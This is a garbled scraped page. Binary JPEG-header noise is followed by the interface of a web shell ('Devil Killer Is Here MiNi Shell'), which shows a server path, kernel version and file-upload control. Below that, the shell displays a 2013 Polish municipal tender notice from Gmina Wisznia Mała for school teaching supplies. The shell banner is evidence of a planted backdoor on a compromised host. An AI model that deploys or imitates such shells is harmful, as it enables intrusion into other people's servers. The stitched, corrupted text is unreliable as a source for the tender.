JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131003/204335-N-2013.html

<p class="kh_header"><b>Wisznia Mała: Dostawa urządzeń i materiałów dydaktycznych niezbędnych do prowadzenia zajęć w projekcie  pn: Rozwój kompetencji kluczowych uczniów i uczennic szkół z obszarów wiejskich Gminy Wisznia Mała</b><br>
<b>Numer ogłoszenia: 204335 - 2013; data zamieszczenia: 03.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wisznia Mała , ul. Wrocławska 9, 55-114 Wisznia Mała, woj. dolnośląskie, tel. 071 3127025, faks 071 3127068.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiszniamala.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa urządzeń i materiałów dydaktycznych niezbędnych do prowadzenia zajęć w projekcie  pn: Rozwój kompetencji kluczowych uczniów i uczennic szkół z obszarów wiejskich Gminy Wisznia Mała.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest dostawa urządzeń i materiałów dydaktycznych niezbędnych do prowadzenia zajęć w projekcie  pn: Rozwój kompetencji kluczowych uczniów i uczennic szkół z obszarów wiejskich Gminy Wisznia Mała. W ramach Programu Operacyjnego Kapitał Ludzki, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie: 9.1.2 wyrównywanie szans edukacyjnych uczniów  z grup o utrudnionym dostępie do dedykacji oraz zmniejszenie różnic w jakości usług edukacyjnych, w ramach Europejskiego Funduszu Społecznego na podstawie umowy POKL.0901.02.02-02-129/12-00.
2.	Przedmiot zamówienia obejmuje: 
Zadanie 1 - Dostawa pomocy dydaktycznych niezbędnych do prowadzenia zajęć
3. Szczegółowy zakres zadań:  
ZADANIE nr 1: 
Lp	Nazwa	Wymagane minimalne parametry techniczne	Jednostka miary	Ilość
1	2	3	4	5

Zadanie 1 - Dostawa pomocy dydaktycznych niezbędnych do prowadzenia zajęć

1	Mikroskop	Mikroskop szkolny o powiększeniach od 40x do 400x wyposażony w szerokopolowy okular WF10x oraz obiektywy 4x, 10x i 40x wkręcane w obrotowa głowicę.  Mikroskop powinien posiadać tarczę obrotową z co najmniej 6 różnymi otworami regulującymi ilość światła przechodzącego przez preparat. Ostrość ustawiana pokrętłem symetrycznym. Wbudowane oświetlenie górne.  Mikroskop zasilany bateriami AA.	szt.	15
2	Kompas	Kompas zamykany z igłą zawieszoną w płynie i przyrządami celowniczymi w obudowie metalowej. Średnica duża ok. 5 cm 	szt.	3
3	Zlewki	Komplet 5 zlewek miarowych wykonanych z polipropylenu o pojemnościach, kolejno:  50, 100, 250, 500 i 1000 ml. 	kpl	3
4	Drut miedziany	Drut miedziany połysk : Długość - 10 metrów , Średnica - 0.8 mm
	szt.	3
5	Menzurki	Komplet 7 różnych menzurek wykonanych z polipropylenu o pojemnościach : 10 ml, 25 ml, 50 ml, 100 ml, 250 ml, 500 ml i 1000 ml	kpl	3
6	Cukier	Cukier spożywczy, sypki pakowany po 1 kg 	kg	3
7	Sól	Sól kuchenna, sypka, pakowana po 1 kg	kg	3
8	Ocet	Ocet spirytusowy 10%, spożywczy, w butelkach po 0,5 litra	litr	3
9	Płyn do naczyń	Płyn do naczyń w butelkach 1 l, łatwo usuwający tłuszcz	szt. 	3
10	Soda oczyszczana	Soda oczyszczana spożywcza. Opakowanie 80g	szt.	9
11	Papier kolorowy A4	Mix kolorów min.4 , uniwersalny do wszystkich technik druku, ryza 100 arkuszy 80g/m2,	ryza	5
12	Papier biały A4	80g/m2, ryza 500 arkuszy, w skali białości 146,161 lub 166	ryza	5
13	Skoroszyt wpinany	Twardy, wpinany do segregatora, tylnia okładka kolorowa przednia przezroczysta, wsuwany papierowy pasek do opisu, metalowe wąsy 	szt. 	30
14	Mulina	Mulina do haftowania 8 m, mix kolorów 	szt.	30
15	Igły	Igły z o grubym oczkiem z możliwością przeciągnięcia muliny. 	szt. 	40
16	Gilotyna	Podręczna gilotyna biurowa z ręcznym systemem docisku papieru, ergonomiczny uchwyt, na blachach roboczych standardowe szablony formatów, jednorazowe cięcie do 80 kartek 80 g, długość cięcia: 320 mm,  format gilotyny; A4  	szt.	3
17	Klej 	Klej w sztyfcie, biurowy, gramatura 8 g	szt.	30
18	Tablica korkowa	Tablica korkowa w drewnianej ramie, wymiary 100x80 cm	szt. 	3
19	Tablica korkowa	Tablica korkowa w drewnianej ramie, wymiary 70x50 cm	szt.	3
20	 Sztalugi	Sztaluga drewniana, duża-  wys. 175 cm 	szt. 	3
21	Balony	Kolorowe balony o średnicy ok. 25 cm,  100 szt. w opakowaniu	opak	3
22	Kabel akumulatorowy krokodylki
 	Przewód dwużyłowy o długości 2 m zakończony krokodylkami (krokodylki czarny i czerwony), styki stalowe, 	kpl	6
23	Baterie płaskie	Bateria 3R 12, 	szt. 	15
24	Baterie R20	Baterie alkaiczne 	szt. 	6
25	Żarówki	Żarówka z gwintem E27, moc żarówki 25 W 	szt. 	15
26	Pryzmat	Zestaw 3 różnych pryzmatów dających czyste i ostre spektrum (widmo). Pryzmat w postaci trójkąta, przeznaczony do doświadczeń. 	kpl. 	3
27	Latarka	Latarka z tworzywa, zasilana na 2 baterie typu R20, soczewka O 6 cm, 
	szt.	3
28	Spinacze	Spinacze biurowe, tradycyjne metalowe,  28 mm, pakowane po 10 x 100 szt. 
w opakowaniu,  	opak	3
29	Szpilki	Szpilki biurowe, pakowane 10 opakowań  po 50 g	opak	3
30	Pinezki	Pinezki beczułki, plastikowe, kolorowe główki, przeznaczone do tablic korkowych, pakowane po 10 opakowań po 50 szt. w opakowaniu	opak	3
31	Zakreślasz 	Do pisania  na wszystkich rodzajach papieru, grubość linii pisania od 1 - 5 mm, opakowane w etui po 4 kolory.	kpl.	9
32	Nożyczki	Nożyczki biurowe, regulowana śruba z nakładką, ostrze ze stali nierdzewnej, długość ostrza 12 cm	szt. 	9
33	Nitka	Nici do szycia, szpula 1000 m  	szt.	3
34	Dratwa 	Szpula 300 mb	szt. 	3
35	Kubki plastikowe	Kubeczki plastikowe  do zimnych napojów, tradycyjne, pakowane po 10 	szt. 	30
36	Zestaw do magnetyzmu 	Zestaw różnych rodzajów magnesów i elementów do szeregu doświadczeń z zakresu magnetyzmu. W zestawie znajduje się min. magnesy (sztabkowe, podkowiasty, okrągłe, z otworami itp.), magnetyt, pudełko z opiłkami, płytki różnych metali, folie magnetyczne i inne. Zestaw przeznaczony do doświadczeń. 	kpl	3
37	Kamerton	Pojedynczy kamerton 440Hz ze zdejmowanymi widełkami 	szt. 	3
38	Świeczki	Świeczki tradycyjne, proste, białe, wysokość  20-25 cm.  	szt. 	9
39	Zapałki 	Zapałki tradycyjne, opakowanie zawiera 10 paczuszek	opak	3
40	Taśma klejąca	Taśma klejąca o uniwersalnym przeznaczeniu, szerokość 48x50 mm przezroczysta 	szt. 	3
41	Statyw	Statyw na probówki szklane w rozmiarze  16x150 mm	szt. 	6
42	Probówki	Probówki szklane z nakrętkami.  Rozmiar 16x150 mm	szt. 	100
43	Rurki plastikowe	Rurki plastikowe do napojów, opakowanie zawiera 100 szt.	opak	3
44	Plastelina	Plastelina przeznaczona dla dzieci i młodzieży (szkolna), w paczce 12 kolorów	opak	6
45	Komplet geometryczny	Komplet czteroelementowy (linijka o dł. Min.20 cm, 2 ekierki, kątomierz), przezroczysty, pakowany w etui	kpl	3
46	Linijka 	Linijka tradycyjna, przezroczysta z podziałką,   30 cm	szt.	3
47	Linijka	Linijka tradycyjna, przezroczysta z podziałką,   50 cm	szt. 	3
48	Linijka 	Linijka tradycyjna, przezroczysta z podziałką,  80 cm 	szt. 	3
49	Siłomierz	Siłomierz metalowy, 10 N/1000 g , przezroczysty korpus, w górnej części nakrętka pozwalającą na łatwą regulację wskazania zera na skali pomiarowej. Skale w sposób trwały naniesione na korpus siłomierza.	Szt.	3
50	Talk kosmetyczny	Talk, opakowanie 140 g 	szt. 	3
51	Lejki	Lejek o średnicy 120 mm, z tworzywa sztucznego	szt. 	6
52	Atrament	Tradycyjny atrament do piór, w buteleczce 30 ml, kolor czerwony	szt.	1
53	Atrament 	Tradycyjny atrament do piór w buteleczce 30 ml, kolor zielony	szt.	1
54	Atrament	Tradycyjny atrament do piór w buteleczce 30 ml, kolor niebieski	szt.	1
55	Pojemnik z przykrywką	Plastikowy pojemnik z przykrywka o wymiarach ok. 43x31x22 cm	szt.	3
56	Papier do druków	Papier przeznaczony do drukowania kolorowej gazetki. Format A4, pakowany w ryzach 	ryza	3
57	Papier na plakaty	Papier z przeznaczenia na plakaty: format B0	arkusz	900
58	Płyty CD/DVD	Płyty do jednokrotnego zapisu 4,7 GB danych lub 120 minut video, płyty w plastikowych obudowach po 10 szt. w opakowaniu  	opak	6
WKŁADY DRUKUJĄCE  
Posiadane przez Zamawiającego urządzenia drukujące 	Wymagane parametry 	Ilość
59	        Brother MFC7320*
	Kolor czarny, wydajność ok. 3.000 stron A4	szt. 	1
60	HP laser JET 125A*	Kolor czarny, wydajność  ok. 2200 stron A4   	szt. 	1
61	HP laser JET 125A*	Kolor błękitny (cyan), wydajność: ok. 1400 stron A4	szt.	1
62	HP laser JET 125A*	Kolor żółty (yellow), wydajność: ok. 1400 stron A4	szt.	1
63	HP laser JET 125A*	Kolor purpurowy (magenta), wydajność: ok. 1400 stron A4	szt.	1
64	HP laser JET 1000*	Kolor czarny, wydajność ok. 2500 stron A4 	szt.	1
65	Dyktafon	Pojemność pamięci: min. 8GB, Wyświetlacz: LCD z podświetleniem, Nagrywanie/odtwarzanie w formacie mp3 lub inny ogólno dostępnym, Zasilanie na baterie lub akumulatorki. 	szt.	6
66	Pendrive	Pojemność pamięci: min. 8 GB,  Interfejs pamięci: USB 2.0,                                          Prędkość odczytu: 28 - 30 MB/s,  Prędkość zapisu 6.5 - 13 MB/s,                              	szt. 	42
*Zamawiający nie dopuszcza możliwości zaoferowania tonerów - zamienników.


4.	W/w projekcie udział biorą następujące placówki oświatowe:
- Szkoła Podstawowa w Wiszni Małej ul. Szkolna 50, 55-114 Wisznia Mała,
- Szkoła Podstawowa w Psarach ul. Główna 40, 51-180 Wrocław,
- Zespół Szkół w Krynicznie ul. Szkolna 6, 55-114 Wisznia Mała, w skład którego wchodzą Gimnazjum i Szkoła Podstawowa..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 31.71.00.00-6, 30.19.21.13-6, 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania przedmiotowego warunku. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2 do SIWZ. 
Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wskazane w roz.VI pkt.1. Z dokumentów i oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania przedmiotowego warunku. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2 do SIWZ. 
Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wskazane w roz.VI pkt.1. Z dokumentów i oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania przedmiotowego warunku. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2 do SIWZ. 
Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wskazane w roz.VI pkt.1. Z dokumentów i oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania przedmiotowego warunku. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2 do SIWZ. 
Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wskazane w roz.VI pkt.1. Z dokumentów i oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania przedmiotowego warunku. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2 do SIWZ. 
Opis sposobu dokonywania oceny spełniania warunku:
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wskazane w roz.VI pkt.1. Z dokumentów i oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. Sporządzony przez wykonawcę Formularz Ofertowy stanowiący załącznik nr 1 do SIWZ;
b. oświadczenie  o spełnieniu warunków udziału w postępowaniu, zgodnie z wzorem przedstawionym w załączniku nr 2 do SIWZ;
c. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego w rozdziale VI ust. 2 pkt  2 w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem przez notariusza;
d. Tabela ceny  
e. Listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r o ochronie konkurencji i konsumentów albo informację o tym, że nie należy do grupy kapitałowej - stanowiący załącznik nr 1 do SIWZ; 
f. Jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, przedstawia w formie oryginału albo kopii poświadczonej za zgodność z oryginałem, dokumenty, o których mowa w rozdziale V ust.2 pkt 2 SIWZ; 
g. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp; 
h. Każdy z wykonawców występujących wspólnie powinien nie podlegać wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Pzp. Każdy z nich powinien złożyć dokumenty w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>nieważności. 
3.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie :
       a) zmiany terminu realizacji przedmiotu umowy w przypadku wystąpienia okoliczności niezależnych od wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji umowy przez Wykonawcę;
        b) zmiany podwykonawców w przypadku:
- wprowadzenia nowego podwykonawcy,
- rezygnacji podwykonawcy,
- zmiany wartości lub zakresu części przedmiotu zamówienia, wykonywanych przez podwykonawców, zamawiający może wyrazić zgodę na powyższe, po pisemnym zaakceptowaniu umowy wykonawcy z podwykonawcą w terminie 14 dni od przekazania tej umowy przez wykonawcę.
      c) zmiany ceny brutto: w przypadku zmiany stawki podatku VAT dla usług objętych przedmiotem zamówienia w trakcie realizacji przedmiotu umowy strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za usługi, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.
      d) zmiana parametrów oferowanego sprzętu lub asortymentu przypadku zaoferowania lepszych parametrów niż określone w przedmiocie zamówienia. 
4. Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę natomiast powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wiszniamala.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wisznia Mała ul. Wrocławska 9 55-114 Wisznia Mała.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 10:00, miejsce: Urząd Gminy Wisznia Mała ul. Wrocławska 9 55-114 Wisznia Mała pok. nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




